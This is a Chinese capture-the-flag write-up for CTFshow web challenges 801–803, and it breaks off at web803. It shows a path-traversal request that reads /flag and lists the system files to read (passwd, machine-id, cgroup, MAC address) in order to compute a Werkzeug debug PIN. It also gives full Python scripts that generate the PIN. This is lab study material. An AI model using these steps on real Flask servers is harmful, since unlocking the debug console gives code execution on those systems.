CTFSHOW 常用姿势篇(801 |
您所在的位置:网站首页 › ctfshow web入门反序列化 › CTFSHOW 常用姿势篇(801 |
|
CTFSHOW 常用姿势篇
群主在视频里面已经讲解的很清楚了,下面内容有些简略,就当补充下payload了。 文章目录 CTFSHOW 常用姿势篇web801web802web803web804web805web806web807web808web809web810 web801非预期解:直接读flag /file?filename=/flag 预期解:计算PIN码 新版的计算方式发生了一些变化 probably_public_bits包含4个字段,分别为 username modname getattr(app, 'name', app.class.name) getattr(mod, 'file', None) 其中username对应的值为当前主机的用户名 linux可以查看/etc/passwd windows可以查看C:/Users目录 modname的值为'flask.app' getattr(app, 'name', app.class.name)对应的值为'Flask' getattr(mod, 'file', None)对应的值为app包的绝对路径 private_bits包含两个字段,分别为 str(uuid.getnode()) get_machine_id() 其中str(uuid.getnode())为网卡mac地址的十进制值 在inux系统下得到存储位置为/sys/class/net/(对应网卡)/address 一般为eth0 windows中cmd执行config /all查看 get_machine_id()的值为当前机器唯一的机器码 对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id docker机则读取/proc/self/cgroup。 windows的id在注册表中 (HKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->Cryptography)新版的代码有些变化,旧版的是下面的 import hashlib import getpass from flask import Flask from itertools import chain import sys import uuid username=getpass.getuser() app = Flask(__name__) modname=getattr(app, "__module__", app.__class__.__module__) mod = sys.modules.get(modname) probably_public_bits = [ username, #用户名 一般为root或者读下/etc/passwd modname, #一般固定为flask.app getattr(app, "__name__", app.__class__.__name__), #固定,一般为Flask getattr(mod, "__file__", None), #flask库下app.py的绝对路径,可以通过报错信息得到 ] mac ='02:42:ac:0c:ac:28'.replace(':','') mac=str(int(mac,base=16)) private_bits = [ mac, "机器码" ] h = hashlib.md5() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, str): bit = bit.encode("utf-8") h.update(bit) h.update(b"cookiesalt") cookie_name = "__wzd" + h.hexdigest()[:20] # If we need to generate a pin we salt it a bit more so that we don't # end up with the same value and generate out 9 digits num=None if num is None: h.update(b"pinsalt") num = ("%09d" % int(h.hexdigest(), 16))[:9] # Format the pincode in groups of digits for easier remembering if # we don't have a result yet. rv=None if rv is None: for group_size in 5, 4, 3: if len(num) % group_size == 0: rv = "-".join( num[x : x + group_size].rjust(group_size, "0") for x in range(0, len(num), group_size) ) break else: rv = num print(rv)新版的如下: import hashlib import getpass from flask import Flask from itertools import chain import sys import uuid import typing as t username='root' app = Flask(__name__) modname=getattr(app, "__module__", t.cast(object, app).__class__.__module__) mod=sys.modules.get(modname) mod = getattr(mod, "__file__", None) probably_public_bits = [ username, #用户名 modname, #一般固定为flask.app getattr(app, "__name__", app.__class__.__name__), #固定,一般为Flask '/usr/local/lib/python3.8/site-packages/flask/app.py', #主程序(app.py)运行的绝对路径 ] print(probably_public_bits) mac ='02:42:ac:0c:ac:28'.replace(':','') mac=str(int(mac,base=16)) private_bits = [ mac,#mac地址十进制 "机器码" ] print(private_bits) h = hashlib.sha1() for bit in chain(probably_public_bits, private_bits): if not bit: continue if isinstance(bit, str): bit = bit.encode("utf-8") h.update(bit) h.update(b"cookiesalt") cookie_name = f"__wzd{h.hexdigest()[:20]}" # If we need to generate a pin we salt it a bit more so that we don't # end up with the same value and generate out 9 digits h.update(b"pinsalt") num = f"{int(h.hexdigest(), 16):09d}"[:9] # Format the pincode in groups of digits for easier remembering if # we don't have a result yet. rv=None if rv is None: for group_size in 5, 4, 3: if len(num) % group_size == 0: rv = "-".join( num[x : x + group_size].rjust(group_size, "0") for x in range(0, len(num), group_size) ) break else: rv = num print(rv)需要填的值就一个变化的地方—机器码。旧版的只需要读取/proc/self/cgroup即可,但是新增需要在前面再拼上/etc/machine-id或者/proc/sys/kernel/random/boot_id的值 web802之前写过一篇专门针对这类题型的文章 web803题目web目录下没有写权限,需要写到其他地方比如/tmp下 首先生成phar文件 |
今日新闻 |
推荐新闻 |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |